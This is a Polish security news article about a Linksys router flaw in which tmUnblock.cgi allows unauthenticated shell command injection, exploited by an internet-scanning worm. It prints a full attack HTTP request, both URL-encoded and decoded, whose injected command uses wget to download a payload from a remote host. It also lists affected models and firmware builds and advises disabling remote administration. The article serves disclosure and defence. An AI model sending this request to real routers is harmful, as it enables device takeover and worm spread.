Poważny błąd w wielu modelach ruterów Linksysa

Chyba już nikogo nie zaskoczy fakt, że w domowych ruterach Linksysa wykryto kolejny poważny błąd, umożliwiający zdalne przejęcie całkowitej kontroli nad urządzeniem. Na dokładkę błąd używany jest przez robaka, skanującego internet.

Kilka dni temu opisaliśmy robaka, który atakuje rutery Linksysa za pomocą niezidentyfikowanego błędu i wykorzystuje je do szukania kolejnych ofiar. Od niedawna wiadomo, o jaki błąd chodzi.

Na czym polega atak

Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.

Przykładowy atak wygląda tak:

POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63
%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f
%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74
%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63
%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20
%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e
%xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69
%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31

Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane. Treść żądania musi być zakodowana, by nie zostać zniekształcona w trakcie przetwarzania, a po odkodowaniu wygląda tak:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://192.168.0.1:193/0Rx.mid;fi`
&StartEPI=1

Powyższy przykład to fragment ataku wspominanego wcześniej robaka. Mamy zatem do czynienia z możliwością zdalnego wykonania kodu przez każdego użytkownika, który może połączyć się z interfejsem www rutera. Oznacza to, że na zdalny atak podatne są jedynie urządzenia, których witryna administracyjna jest publicznie dostępna w sieci. Rutery, które mają wyłączony dostęp zdalny, podatne są jedynie na atak lokalny i ich posiadacze w zasadzie mogą spać spokojnie.

Jeśli Wasz ruter Linksysa ze standardowym oprogramowaniem jest dostępny zdalnie, to zalecamy szybką zmianę tego ustawienia, ponieważ w sieci zostały już opublikowane przykładowe kody źródłowe exploitów.

Które urządzenia są podatne

Według naszej analizy urządzeń, które aktywnie prowadzą ataki, podatne są co najmniej poniższe modele i wersje oprogramowania:

• E1000 2.1.01 build 5
• E1200 1.0.00 build 11
• E1200 2.0.04 build 1
• E1200 2.0.05 build 2
• E1200 2.0.06 build 6
• E1500 1.0.01 build 4
• E1500 1.0.04 build 2
• E2500 1.0.01 build 3
• E2500 1.0.03 build 4
• E2500 1.0.04 build 1
• E2500 1.0.05 build 1
• E2500 1.0.05 build 2
• E2500 1.0.07 build 1
• E3200 1.0.00 build 13
• E3200 1.0.01 build 3
• E3200 1.0.03 build 9
• E3200 1.0.04 build 1
• E4200 1.0.02 build 13
• E4200 1.0.04 build 11
• E4200 1.0.05 build 7

Dodatkowo w kodzie robaka odnaleziono listę urządzeń, które próbuje infekować – jest ona dużo dłuższa i nie wiemy, czy wszystkie znajdujące się na niej modele są podatne. Oprócz modeli wymienionych powyżej mogą to także być:

• E3000
• E2100L
• E2000
• E1550
• E900
• E300
• WAG320N
• WAP300N
• WAP610N
• WES610N
• WET610N
• WRT610N
• WRT600N
• WRT400N
• WRT320N
• WRT160N
• WRT150N

Jeśli Wasz ruter nie znajduje się na powyższej liście, to tak czy inaczej zalecamy wyłączenie zdalnego dostępu i zmianę hasła administratora.